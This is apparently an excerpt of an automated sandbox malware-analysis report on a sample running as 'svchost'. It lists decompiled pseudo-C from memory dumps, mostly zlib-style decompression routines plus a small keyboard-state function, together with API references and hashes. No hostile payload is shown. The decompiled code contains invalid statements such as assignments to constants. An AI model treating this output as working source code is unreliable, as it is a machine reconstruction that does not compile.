    									__esi[2] = __esi[2] + 1;
    									__esi[1] = __eax;
    									__eax = __esi[7];
    									__edi = __ebx;
    									 *(__esi[7] + 8) =  *(__esi[7] + 8) + (0 << 0x10);
    									 *__esi =  *__esi + 1;
    									 *__esi =  *__esi + 1;
    									__eax = __esi[7];
    									 *(__esi[7]) = 0xa;
    									goto L29;
    								}
    								goto L52;
    							case 0xa:
    								L29:
    								__eax = __esi[1];
    								if(__eax == 0) {
    									goto L36;
    								} else {
    									__eax = __eax - 1;
    									__esi[2] = __esi[2] + 1;
    									__esi[1] = __eax;
    									__eax = __esi[7];
    									__edi = __ebx;
    									 *(__esi[7] + 8) =  *(__esi[7] + 8) + (0 << 8);
    									 *__esi =  *__esi + 1;
    									 *__esi =  *__esi + 1;
    									__eax = __esi[7];
    									 *(__esi[7]) = 0xb;
    									goto L31;
    								}
    								goto L52;
    							case 0xb:
    								L31:
    								__eax = __esi[1];
    								if(__eax == 0) {
    									L36:
    									return _t231;
    								} else {
    									__esi[1] = __eax;
    									__eax = __esi[7];
    									__esi[2] = __esi[2] + 1;
    									__edi = __ebx;
    									 *(__esi[7] + 8) =  *(__esi[7] + 8);
    									 *__esi =  *__esi + 1;
    									 *__esi =  *__esi + 1;
    									__eax = __esi[7];
    									if( *((intOrPtr*)(__eax + 4)) ==  *((intOrPtr*)(__eax + 8))) {
    										 *(__esi[7]) = 0xc;
    										goto L50;
    									} else {
    										 *__eax = 0xd;
    										__esi[6] = "incorrect data check";
    										 *((intOrPtr*)(__esi[7] + 4)) = __ebp;
    										goto L4;
    									}
    								}
    								goto L52;
    							case 0xc:
    								L50:
    								__eax = 1;
    								return 1;
    								goto L52;
    							case 0xd:
    								__eax = 0xfffffffd;
    								return 0xfffffffd;
    								goto L52;
    						}
    					}
    					goto L48;
    				}
    				L52:
    			}









    Instruction address column for E00464BF0 (0x00464bf3 through 0x00464fe6, with 0x00000000 placeholders for unresolved entries); the instruction text beside each address was not extracted, only the addresses survive.

    Strings
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID:
    • String ID: incorrect data check$incorrect header check$invalid window size$need dictionary$unknown compression method
    • API String ID: 0-2151277842
    • Opcode ID: 2a88a98287c68e7c6b7ad2147af1f79b51ec828034c31d7a61558b12580fba8e
    • Instruction ID: 1ad95f0c2d16bc8042050f1dfa220393888d0d89ccd67f26a4b99736583f6420
    • Opcode Fuzzy Hash: 2a88a98287c68e7c6b7ad2147af1f79b51ec828034c31d7a61558b12580fba8e
    • Instruction Fuzzy Hash: B0E1F4B5600A018FD738CF19D490A12FBE2FF89310B25C96ED59ACBB61E735E846CB54
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00486887(void* __ecx) {
    				void* _t11;
    				void* _t12;
    				void* _t16;
    
    				_t12 = __ecx;
    				if((E004874EA(__ecx) & 0x40000000) != 0) {
    					L6:
    					return E00484BEB(_t12);
    				}
    				_t16 = E0046F80D();
    				if(_t16 == 0 || GetKeyState(0x10) < 0 || GetKeyState(0x11) < 0 || GetKeyState(0x12) < 0) {
    					goto L6;
    				} else {
    					SendMessageA( *(_t16 + 0x1c), 0x111, 0xe146, 0);
    					_t11 = 1;
    					return _t11;
    				}
    			}






    Instruction address column for E00486887 (0x0048688a through 0x004868e0, with 0x00000000 placeholders for unresolved entries); the instruction text beside each address was not extracted, only the addresses survive.

    APIs
      • Part of subcall function 004874EA: GetWindowLongA.USER32(?,000000F0), ref: 004874F6
    • GetKeyState.USER32(00000010), ref: 004868AB
    • GetKeyState.USER32(00000011), ref: 004868B4
    • GetKeyState.USER32(00000012), ref: 004868BD
    • SendMessageA.USER32(?,00000111,0000E146,00000000), ref: 004868D3
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: State$LongMessageSendWindow
    • String ID:
    • API String ID: 1063413437-0
    • Opcode ID: 8d9cad45b61e3fc8e41001a9f3c073cfe812306e50b30b7cf0ae3639dd6f7e82
    • Instruction ID: 695cd474cf26c759a1449143a75662647d6dc83257c4ad955ca9ec150f5d95e2
    • Opcode Fuzzy Hash: 8d9cad45b61e3fc8e41001a9f3c073cfe812306e50b30b7cf0ae3639dd6f7e82
    • Instruction Fuzzy Hash: D8F0E236B0236A37E66032612C46FAD01150B90BA8F020C3BBB04BB1D18AD9C8125378
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 94%
    			E00466800() {
    				signed int* _t450;
    				signed int _t452;
    				void* _t454;
    				signed int _t455;
    				signed int _t456;
    				signed int* _t465;
    				signed int _t467;
    				signed int _t469;
    				signed int _t501;
    				void* _t503;
    				void* _t507;
    
    				_t450 =  *(_t507 + 0x38);
    				_t465 =  *(_t507 + 0x38);
    				_t501 = _t465[7];
    				 *(_t507 + 8) =  *_t450;
    				_t467 = _t465[0xd];
    				 *(_t507 + 0x10) = _t465[8];
    				_t452 = _t465[0xc];
    				 *(_t507 + 0x14) = _t450[1];
    				 *(_t507 + 0x44) = _t467;
    				if(_t467 >= _t452) {
    					_t454 = _t465[0xb] - _t467;
    				} else {
    					_t454 = _t452 - _t467 - 1;
    				}
    				 *(_t507 + 0x1c) = _t454;
    				while(1) {
    					L4:
    					_t455 =  *_t465;
    					if(_t455 > 9) {
    						break;
    					}
    					switch( *((intOrPtr*)(_t455 * 4 +  &M004674C0))) {
    						case 0:
    							_t497 =  *(_t507 + 0x18);
    							if(_t501 >= 3) {
    								goto L12;
    							} else {
    								_t461 =  *(_t507 + 0x14);
    								_t492 =  *(_t507 + 0x10);
    								while(_t461 != 0) {
    									_t461 = _t461 - 1;
    									 *(_t507 + 0x4c) = 0;
    									_t488 = 0 << _t501;
    									_t501 = 8 + _t501;
    									 *(_t507 + 0x14) = _t461;
    									_t497 = _t497 | _t488;
    									_t492 = _t492 + 1;
    									 *(_t507 + 0x18) = _t497;
    									 *(_t507 + 0x10) = _t492;
    									if(_t501 < 3) {
    										continue;
    									} else {
    										L12:
    										_t459 = _t497 & 0x00000007;
    										_t460 = _t459 >> 1;
    										_t465[6] = _t459 & 0x00000001;
    										if(_t460 > 3) {
    											goto L4;
    										} else {
    											switch( *((intOrPtr*)(_t460 * 4 +  &M004674E8))) {
    												case 0:
    													goto L14;
    												case 1:
    													goto L15;
    												case 2:
    													goto L17;
    												case 3:
    													goto L100;
    											}
    										}
    									}
    									goto L127;
    								}
    								_t462 =  *(_t507 + 0x48);
    								_t465[8] = _t497;
    								_t465[7] = _t501;
    								_t506 =  *(8 + _t462) + _t492 -  *_t462;
    								__eflags = _t506;
    								 *(4 + _t462) = 0;
    								 *(8 + _t462) = _t506;
    								 *_t462 = _t492;
    								_t465[0xd] =  *(_t507 + 0x44);
    								return E00467F40(_t465, _t462,  *(_t507 + 0x4c));
    							}
    							goto L127;
    						case 1:
    							__esi =  *(__esp + 0x18);
    							__edi =  *(__esp + 0x14);
    							__eax =  *(__esp + 0x10);
    							__eflags = __ebp - 0x20;
    							if(__ebp >= 0x20) {
    								L21:
    								__edx = __esi;
    								__ecx = __esi;
    								__edx =  !__esi;
    								__ecx = __esi & 0x0000ffff;
    								 !__esi >> 0x10 =  !__esi >> 0x00000010 ^ __ecx;
    								__eflags =  !__esi >> 0x00000010 ^ __ecx;
    								if(( !__esi >> 0x00000010 ^ __ecx) != 0) {
    									__ecx =  *(__esp + 0x48);
    									 *__ebx = 9;
    									__edx = __eax;
    									 *(__ecx + 0x18) = "invalid stored block lengths";
    									__ebx[8] = __esi;
    									__ebx[7] = __ebp;
    									__esi =  *__ecx;
    									__ebp =  *(8 + __ecx);
    									__edx = __eax -  *__ecx;
    									__ebp = __eax -  *__ecx +  *(8 + __ecx);
    									__eflags = __ebp;
    									 *__ecx = __eax;
    									__eax =  *(__esp + 0x48);
    									 *(4 + __ecx) = __edi;
    									 *(8 + __ecx) = __ebp;
    									__ebx[0xd] =  *(__esp + 0x48);
    									__eax = E00467F40(__ebx, __ecx, 0xfffffffd);
    									_pop(__edi);
    									_pop(__esi);
    									return __eax;
    								} else {
    									__ebp = 0;
    									__eax = __ecx;
    									__eflags = __ecx;
    									__ebx[1] = __ecx;
    									 *(__esp + 0x18) = 0;
    									if(__ecx == 0) {
    										goto L48;
    									} else {
    										__eax = 2;
    										 *__ebx = 2;
    									}
    									goto L4;
    								}
    							} else {
    								while(1) {
    									__edx = 0;
    									__eflags = __edi;
    									if(__edi == 0) {
    										break;
    									}
    									__ecx = 0;
    									 *(__esp + 0x4c) = 0;
    									__cl =  *__eax;
    									__edi = __edi - 1;
    									__edx = 0;
    									__ecx = __ebp;
    									__edx = 0 << __cl;
    									__ebp = 8 + __ebp;
    									 *(__esp + 0x14) = __edi;
    									__esi = __esi | 0 << __cl;
    									__eax = __eax + 1;
    									__eflags = __ebp - 0x20;
    									 *(__esp + 0x10) = __eax;
    									if(__ebp < 0x20) {
    										continue;
    									} else {
    										goto L21;
    									}
    									goto L127;
    								}
    								__ecx =  *(__esp + 0x48);
    								__ebx[8] = __esi;
    								__ebx[7] = __ebp;
    								__esi =  *__ecx;
    								__ebp =  *(8 + __ecx);
    								 *(4 + __ecx) = 0;
    								__edx = __eax;
    								__edx = __eax -  *__ecx;
    								 *__ecx = __eax;
    								__eax =  *(__esp + 0x44);
    								__ebp = __edx +  *(8 + __ecx);
    								__eflags = __ebp;
    								__edx =  *(__esp + 0x4c);
    								 *(8 + __ecx) = __ebp;
    								__ebx[0xd] =  *(__esp + 0x44);
    								__eax = E00467F40(__ebx, __ecx,  *(__esp + 0x4c));
    								_pop(__edi);
    								_pop(__esi);
    								return __eax;
    							}
    							goto L127;
    						case 2:
    							__edi =  *(__esp + 0x14);
    							__eflags = __edi;
    							if(__edi == 0) {
    								__ecx =  *(__esp + 0x18);
    								__eax =  *(__esp + 0x48);
    								__ebx[8] =  *(__esp + 0x18);
    								__ecx =  *(__esp + 0x10);
    								__ebx[7] = __ebp;
    								__esi =  *__eax;
    								__ebp =  *(__eax + 8);
    								__edx = __ecx;
    								__edx = __ecx -  *__eax;
    								 *__eax = __ecx;
    								__ecx =  *(__esp + 0x44);
    								__ebp = __edx +  *(__eax + 8);
    								__eflags = __ebp;
    								__edx =  *(__esp + 0x4c);
    								 *(__eax + 4) = 0;
    								 *(__eax + 8) = __ebp;
    								__ebx[0xd] =  *(__esp + 0x44);
    								__eax = E00467F40(__ebx, __eax,  *(__esp + 0x4c));
    								_pop(__edi);
    								_pop(__esi);
    								return __eax;
    							} else {
    								__ecx =  *(__esp + 0x1c);
    								__eflags = __ecx;
    								if(__ecx != 0) {
    									L43:
    									__eax = __ebx[1];
    									 *(__esp + 0x4c) = 0;
    									__eflags = __eax - __edi;
    									if(__eax > __edi) {
    										__eax = __edi;
    									}
    									__eflags = __eax - __ecx;
    									if(__eax > __ecx) {
    										__eax = __ecx;
    									}
    									__esi =  *(__esp + 0x10);
    									__edi =  *(__esp + 0x44);
    									__ecx = __eax;
    									__edx = __ecx;
    									__ecx = __ecx >> 2;
    									__eax = memcpy( *(__esp + 0x44), __esi, __ecx << 2);
    									__edi = __esi + __ecx;
    									__edi = __esi + __ecx + __ecx;
    									__ecx = 0;
    									__ecx = __edx;
    									__edx =  *(__esp + 0x1c);
    									__ecx = __ecx & 0x00000003;
    									__edx =  *(__esp + 0x1c) - __eax;
    									__eax = memcpy(__edi, __esi, __ecx);
    									__esi + __ecx = __esi + __ecx + __ecx;
    									0 =  *(__esp + 0x10);
    									__edi =  *(__esp + 0x14);
    									__esi =  *(__esp + 0x44);
    									__ecx = __eax +  *(__esp + 0x10);
    									 *(__esp + 0x10) = __eax +  *(__esp + 0x10);
    									__ecx = __ebx[1];
    									__edi =  *(__esp + 0x14) - __eax;
    									__esi =  *(__esp + 0x44) + __eax;
    									__ecx = __ebx[1] - __eax;
    									__eflags = __ecx;
    									 *(__esp + 0x14) = __edi;
    									 *(__esp + 0x44) = __esi;
    									 *(__esp + 0x1c) = __edx;
    									__ebx[1] = __ecx;
    									if(__ecx == 0) {
    										L48:
    										__ebx[6] =  ~(__ebx[6]);
    										asm("sbb eax, eax");
    										__eax =  ~(__ebx[6]) & 0x00000007;
    										 *__ebx =  ~(__ebx[6]) & 0x00000007;
    									}
    									goto L4;
    								} else {
    									__ecx = __ebx[0xb];
    									__edx =  *(__esp + 0x44);
    									__eflags = __edx - __ecx;
    									if(__edx != __ecx) {
    										L32:
    										__eax =  *(__esp + 0x4c);
    										__edi =  *(__esp + 0x48);
    										__ebx[0xd] = __edx;
    										__eax = E00467F40(__ebx, __edi,  *(__esp + 0x4c));
    										__edx = __ebx[0xd];
    										__esi = __ebx[0xc];
    										__eflags = __edx - __esi;
    										 *(__esp + 0x4c) = __eax;
    										 *(__esp + 0x44) = __edx;
    										if(__edx >= __esi) {
    											__ecx = __ebx[0xb];
    											__ecx = __ebx[0xb] - __edx;
    											__eflags = __ecx;
    										} else {
    											__esi = __esi - __edx;
    											__ecx = __esi - __edx - 1;
    										}
    										__eax = __ebx[0xb];
    										 *(__esp + 0x1c) = __ecx;
    										__eflags = __edx - __eax;
    										 *(__esp + 0x20) = __eax;
    										if(__edx == __eax) {
    											__eax = __ebx[0xa];
    											__eflags = __esi - __eax;
    											if(__esi != __eax) {
    												__edx = __eax;
    												__eflags = __edx - __esi;
    												 *(__esp + 0x44) = __edx;
    												if(__edx >= __esi) {
    													__ecx =  *(__esp + 0x20);
    													__ecx =  *(__esp + 0x20) - __edx;
    													__eflags = __ecx;
    												} else {
    													__esi = __esi - __edx;
    													__ecx = __esi;
    												}
    												 *(__esp + 0x1c) = __ecx;
    											}
    										}
    										__eflags = __ecx;
    										if(__ecx == 0) {
    											__eax =  *(__esp + 0x18);
    											__ecx =  *(__esp + 0x14);
    											__ebx[8] =  *(__esp + 0x18);
    											__eax =  *(__esp + 0x10);
    											__ebx[7] = __ebp;
    											__ebp =  *__edi;
    											__esi =  *(__edi + 8);
    											 *(__edi + 4) =  *(__esp + 0x14);
    											__ecx = __eax;
    											 *__edi = __eax;
    											__ecx = __eax -  *__edi;
    											__esi =  *(__edi + 8) + __eax -  *__edi;
    											__eflags = __esi;
    											 *(__edi + 8) = __esi;
    											__ebx[0xd] = __edx;
    											__edx =  *(__esp + 0x4c);
    											__eax = E00467F40(__ebx, __edi,  *(__esp + 0x4c));
    											_pop(__edi);
    											_pop(__esi);
    											return __eax;
    										} else {
    											__edi =  *(__esp + 0x14);
    											goto L43;
    										}
    									} else {
    										__eax = __ebx[0xc];
    										__esi = __ebx[0xa];
    										__eflags = __eax - __esi;
    										if(__eax == __esi) {
    											goto L32;
    										} else {
    											__edx = __esi;
    											__eflags = __edx - __eax;
    											 *(__esp + 0x44) = __edx;
    											if(__edx >= __eax) {
    												__ecx = __ecx - __edx;
    												__eflags = __ecx;
    											} else {
    												__eax = __eax - __edx;
    												__ecx = __eax;
    											}
    											__eflags = __ecx;
    											 *(__esp + 0x1c) = __ecx;
    											if(__ecx != 0) {
    												goto L43;
    											} else {
    												goto L32;
    											}
    										}
    									}
    								}
    							}
    							goto L127;
    						case 3:
    							__edi =  *(__esp + 0x18);
    							__eflags = __ebp - 0xe;
    							if(__ebp >= 0xe) {
    								L53:
    								__eax = __edi;
    								__eax = __edi & 0x00003fff;
    								__ecx = __eax;
    								__ebx[1] = __eax;
    								__ecx = __eax & 0x0000001f;
    								__eflags = __ecx - 0x1d;
    								if(__ecx > 0x1d) {
    									L107:
    									__eax =  *(__esp + 0x48);
    									__ecx =  *(__esp + 0x14);
    									 *__ebx = 9;
    									 *(__eax + 0x18) = "too many length or distance symbols";
    									__ebx[8] = __edi;
    									__ebx[7] = __ebp;
    									__esi =  *__eax;
    									__ebp =  *(__eax + 8);
    									 *(__eax + 4) =  *(__esp + 0x14);
    									__ecx =  *(__esp + 0x14);
    									__edx = __ecx;
    									 *__eax = __ecx;
    									__ecx =  *(__esp + 0x4c);
    									__ebp = __edx +  *(__eax + 8);
    									__eflags = __ebp;
    									 *(__eax + 8) = __ebp;
    									__ebx[0xd] =  *(__esp + 0x4c);
    									__eax = E00467F40(__ebx, __eax, 0xfffffffd);
    									_pop(__edi);
    									_pop(__esi);
    									return __eax;
    								} else {
    									__eax = __eax & 0x000003e0;
    									__eflags = (__eax & 0x000003e0) - 0x3a0;
    									if((__eax & 0x000003e0) > 0x3a0) {
    										goto L107;
    									} else {
    										__esi =  *(__esp + 0x48);
    										_push(4);
    										__eax = __eax >> 5;
    										__eax = __eax & 0x0000001f;
    										__eax = __eax + __ecx + 0x102;
    										__ecx =  *(__esi + 0x28);
    										_push(__eax);
    										_push( *(__esi + 0x28));
    										__eax =  *((intOrPtr*)(__esi + 0x20))();
    										__esp = __esp + 0xc;
    										__ebx[3] = __eax;
    										__eflags = __eax;
    										if(__eax == 0) {
    											__eax =  *(__esp + 0x14);
    											__ebx[8] = __edi;
    											__ebx[7] = __ebp;
    											__edi =  *__esi;
    											__edx =  *(__esi + 8);
    											 *(__esi + 4) =  *(__esp + 0x14);
    											__eax =  *(__esp + 0x10);
    											__eax = __eax -  *__esi;
    											 *__esi = __eax;
    											__edx =  *(__esi + 8) + __eax -  *__esi;
    											__eflags = __edx;
    											 *(__esi + 8) = __edx;
    											__edx =  *(__esp + 0x50);
    											__ebx[0xd] =  *(__esp + 0x50);
    											__eax = E00467F40(__ebx, __esi, 0xfffffffc);
    											_pop(__edi);
    											_pop(__esi);
    											return __eax;
    										} else {
    											__edi = __edi >> 0xe;
    											__ebp = __ebp - 0xe;
    											__ebx[2] = 0;
    											 *__ebx = 4;
    											goto L58;
    										}
    									}
    								}
    							} else {
    								__esi =  *(__esp + 0x14);
    								__eax =  *(__esp + 0x10);
    								while(1) {
    									__eflags = __esi;
    									if(__esi == 0) {
    										break;
    									}
    									__ecx = 0;
    									__esi = __esi - 1;
    									__cl =  *__eax;
    									 *(__esp + 0x4c) = 0;
    									__edx = 0;
    									__ecx = __ebp;
    									__edx = 0 << __cl;
    									__ebp = 8 + __ebp;
    									 *(__esp + 0x14) = __esi;
    									__edi = __edi | 0 << __cl;
    									__eax = __eax + 1;
    									__eflags = __ebp - 0xe;
    									 *(__esp + 0x10) = __eax;
    									if(__ebp < 0xe) {
    										continue;
    									} else {
    										goto L53;
    									}
    									goto L127;
    								}
    								__eax =  *(__esp + 0x48);
    								__ecx =  *(__esp + 0x10);
    								__ebx[8] = __edi;
    								__ebx[7] = __ebp;
    								__esi =  *__eax;
    								__ebp =  *(__eax + 8);
    								__edx = __ecx;
    								 *__eax = __ecx;
    								__ecx =  *(__esp + 0x44);
    								__ebp = __edx +  *(__eax + 8);
    								__eflags = __ebp;
    								__edx =  *(__esp + 0x4c);
    								 *(__eax + 4) = 0;
    								 *(__eax + 8) = __ebp;
    								__ebx[0xd] =  *(__esp + 0x44);
    								__eax = E00467F40(__ebx, __eax,  *(__esp + 0x4c));
    								_pop(__edi);
    								_pop(__esi);
    								return __eax;
    							}
    							goto L127;
    						case 4:
    							__edi =  *(__esp + 0x18);
    							__esi =  *(__esp + 0x48);
    							L58:
    							__edx = __ebx[1];
    							__eax = __ebx[2];
    							__ebx[1] >> 0xa = 4 + (__ebx[1] >> 0xa);
    							__eflags = __ebx[2] - 4 + (__ebx[1] >> 0xa);
    							if(__ebx[2] >= 4 + (__ebx[1] >> 0xa)) {
    								L64:
    								__ecx = __ebx[2];
    								__eax = 0x13;
    								__eflags = __ebx[2] - 0x13;
    								if(__ebx[2] < 0x13) {
    									do {
    										__ecx = __ebx[2];
    										__edx =  *(0x49b274 + __ebx[2] * 4);
    										__ecx = __ebx[3];
    										 *(__ebx[3] +  *(0x49b274 + __ebx[2] * 4) * 4) = 0;
    										__edx = __ebx[2];
    										__edx = __ebx[2] + 1;
    										__ecx = __edx;
    										__ebx[2] = __edx;
    										__eflags = __edx - 0x13;
    									} while (__edx < 0x13);
    								}
    								__edx = __ebx[9];
    								__ecx =  &(__ebx[5]);
    								__eax =  &(__ebx[4]);
    								__edx = __ebx[3];
    								__ebx[4] = 7;
    								__eax = E00467CD0(__ebx[3], __eax,  &(__ebx[5]), __ebx[9], __esi);
    								 *(__esp + 0x18) = __eax;
    								__eflags = __eax;
    								if(__eax != 0) {
    									__edx = __ebx[3];
    									__eax =  *(__esi + 0x28);
    									_push(__ebx[3]);
    									_push( *(__esi + 0x28));
    									__eax =  *((intOrPtr*)(__esi + 0x24))();
    									__eax =  *(__esp + 0x20);
    									__esp = __esp + 8;
    									__eflags = __eax - 0xfffffffd;
    									goto L113;
    								} else {
    									__ebx[2] = __eax;
    									 *__ebx = 5;
    									goto L69;
    								}
    							} else {
    								do {
    									__eflags = __ebp - 3;
    									if(__ebp >= 3) {
    										goto L63;
    									} else {
    										__eax =  *(__esp + 0x10);
    										while(1) {
    											__ecx =  *(__esp + 0x14);
    											__eflags = __ecx;
    											if(__ecx == 0) {
    												break;
    											}
    											__edx = __ecx;
    											__ecx = 0;
    											__cl =  *__eax;
    											 *(__esp + 0x14) = __edx;
    											__edx = 0;
    											__ecx = __ebp;
    											__ebp = 8 + __ebp;
    											__edx = 0 << __cl;
    											 *(__esp + 0x4c) = 0;
    											__edi = __edi | 0 << __cl;
    											__eax = __eax + 1;
    											__eflags = __ebp - 3;
    											 *(__esp + 0x10) = __eax;
    											if(__ebp < 3) {
    												continue;
    											} else {
    												goto L63;
    											}
    											goto L127;
    										}
    										__eax =  *(__esp + 0x10);
    										__ebx[8] = __edi;
    										__ebx[7] = __ebp;
    										__edi =  *__esi;
    										__ecx =  *(__esi + 8);
    										__edx = __eax;
    										__edx = __eax -  *__esi;
    										 *__esi = __eax;
    										__eax =  *(__esp + 0x44);
    										__ecx =  *(__esi + 8) + __edx;
    										__eflags = __ecx;
    										 *(__esi + 8) = __ecx;
    										__ecx =  *(__esp + 0x4c);
    										 *(__esi + 4) = 0;
    										__ebx[0xd] =  *(__esp + 0x44);
    										__eax = E00467F40(__ebx, __esi,  *(__esp + 0x4c));
    										_pop(__edi);
    										_pop(__esi);
    										return __eax;
    									}
    									goto L127;
    									L63:
    									__ecx = __ebx[2];
    									__eax = __edi;
    									__eax = __edi & 0x00000007;
    									__ebp = __ebp - 3;
    									__edx =  *(0x49b274 + __ebx[2] * 4);
    									__ecx = __ebx[3];
    									__edi = __edi >> 3;
    									 *(__ebx[3] +  *(0x49b274 + __ebx[2] * 4) * 4) = __eax;
    									__edx = __ebx[2];
    									__edx = __ebx[2] + 1;
    									__ebx[2] = __edx;
    									__eax = __edx;
    									__ebx[1] = __ebx[1] >> 0xa;
    									__edx = 4 + (__ebx[1] >> 0xa);
    									__eflags = __eax - 4 + (__ebx[1] >> 0xa);
    								} while (__eax < 4 + (__ebx[1] >> 0xa));
    								goto L64;
    							}
    							goto L127;
    						case 5:
    							__edi =  *(__esp + 0x18);
    							__esi =  *(__esp + 0x48);
    							L69:
    							__eax = __ebx[1];
    							__ecx = __ebx[2];
    							__edx = __eax;
    							__eax = __eax & 0x0000001f;
    							__edx = __edx >> 5;
    							__edx = __edx & 0x0000001f;
    							_t141 = __eax + 0x102; // 0x102
    							__eax = __edx + _t141;
    							__eflags = __ebx[2] - __edx + _t141;
    							if(__ebx[2] >= __edx + _t141) {
    								L88:
    								__ecx = __ebx[9];
    								__eax = __ebx[1];
    								__edx = __esp + 0x40;
    								__ecx = __esp + 0x44;
    								__edx = __esp + 0x2c;
    								__ecx = __esp + 0x30;
    								__edx = __ebx[3];
    								__eax = __eax >> 5;
    								__ecx = __eax >> 0x00000005 & 0x0000001f;
    								__eax = __eax & 0x0000001f;
    								__ecx = __ecx + 1;
    								__eax = __eax + 0x101;
    								__ebx[5] = 0;
    								 *(__esp + 0x44) = 9;
    								 *(__esp + 0x40) = 6;
    								__eax = E00467D80(__eax, __ecx, __ebx[3], __ecx, __esp + 0x2c, __ecx, __esp + 0x40, __ebx[9], __esi);
    								__edx = __ebx[3];
    								 *(__esp + 0x3c) = __eax;
    								__eax =  *(__esi + 0x28);
    								_push(__ebx[3]);
    								_push( *(__esi + 0x28));
    								__eax =  *((intOrPtr*)(__esi + 0x24))();
    								__eax =  *(__esp + 0x44);
    								__esp = __esp + 0x2c;
    								__eflags = __eax;
    								if(__eax != 0) {
    									__eflags =  *(__esp + 0x18) - 0xfffffffd;
    									L113:
    									if(__eflags == 0) {
    										 *__ebx = 9;
    									}
    									__eax =  *(__esp + 0x10);
    									__ecx =  *(__esp + 0x14);
    									__ebx[8] = __edi;
    									__ebx[7] = __ebp;
    									__edi =  *__esi;
    									__edx = __eax;
    									 *(__esi + 4) =  *(__esp + 0x14);
    									__ecx =  *(__esi + 8);
    									__edx = __eax -  *__esi;
    									 *__esi = __eax;
    									__eax =  *(__esp + 0x44);
    									__ecx =  *(__esi + 8) + __edx;
    									__eflags = __ecx;
    									 *(__esi + 8) = __ecx;
    									__ecx =  *(__esp + 0x18);
    									__ebx[0xd] =  *(__esp + 0x44);
    									__eax = E00467F40(__ebx, __esi,  *(__esp + 0x18));
    									_pop(__edi);
    									_pop(__esi);
    									return __eax;
    								} else {
    									__ecx =  *(__esp + 0x38);
    									__edx =  *(__esp + 0x3c);
    									__eax =  *(__esp + 0x1c);
    									__eax = E0045F990( *((intOrPtr*)(__esp + 0x28)),  *(__esp + 0x1c),  *(__esp + 0x3c),  *((intOrPtr*)(__esp + 0x28)), __esi);
    									__eflags = __eax;
    									if(__eax == 0) {
    										__eax =  *(__esp + 0x10);
    										__edx =  *(__esp + 0x14);
    										__ebx[8] = __edi;
    										__ebx[7] = __ebp;
    										__edi =  *__esi;
    										__ecx = __eax;
    										 *(__esi + 4) =  *(__esp + 0x14);
    										__edx =  *(__esi + 8);
    										__ecx = __eax -  *__esi;
    										__edx =  *(__esi + 8) + __eax -  *__esi;
    										__eflags = __edx;
    										 *(__esi + 8) = __edx;
    										__edx =  *(__esp + 0x4c);
    										 *__esi = __eax;
    										__ebx[0xd] =  *(__esp + 0x4c);
    										__eax = E00467F40(__ebx, __esi, 0xfffffffc);
    										_pop(__edi);
    										_pop(__esi);
    										return __eax;
    									} else {
    										__ebx[1] = __eax;
    										 *__ebx = 6;
    										goto L92;
    									}
    								}
    							} else {
    								do {
    									__eax = __ebx[4];
    									__eflags = __ebp - __eax;
    									if(__ebp >= __eax) {
    										L73:
    										__eax =  *(0x4b83a0 + __eax * 4);
    										__ecx = __ebx[5];
    										__eax = __eax & __edi;
    										__edx = 0;
    										__eax = __ebx[5] + __eax * 8;
    										 *(__esp + 0x18) = 0;
    										__eax =  *(__eax + 4);
    										__eflags = __eax - 0x10;
    										 *(__esp + 0x34) = __eax;
    										if(__eax >= 0x10) {
    											__eflags = __eax - 0x12;
    											__ecx = 7;
    											if(__eax != 0x12) {
    												_t165 = __eax - 0xe; // -14
    												__ecx = _t165;
    											}
    											__eax = __eax - 0x12;
    											 *(__esp + 0x1c) = __ecx;
    											__eax =  ~__eax;
    											asm("sbb eax, eax");
    											__ecx = __edx + __ecx;
    											__al = __al & 0x000000f8;
    											 *(__esp + 0x20) = __ecx;
    											__eax = __eax + 0xb;
    											__eflags = __ebp - __ecx;
    											if(__ebp >= __ecx) {
    												L81:
    												__ecx = __edx;
    												__edi = __edi >> __cl;
    												__ecx =  *(__esp + 0x1c);
    												__ecx =  *(0x4b83a0 +  *(__esp + 0x1c) * 4);
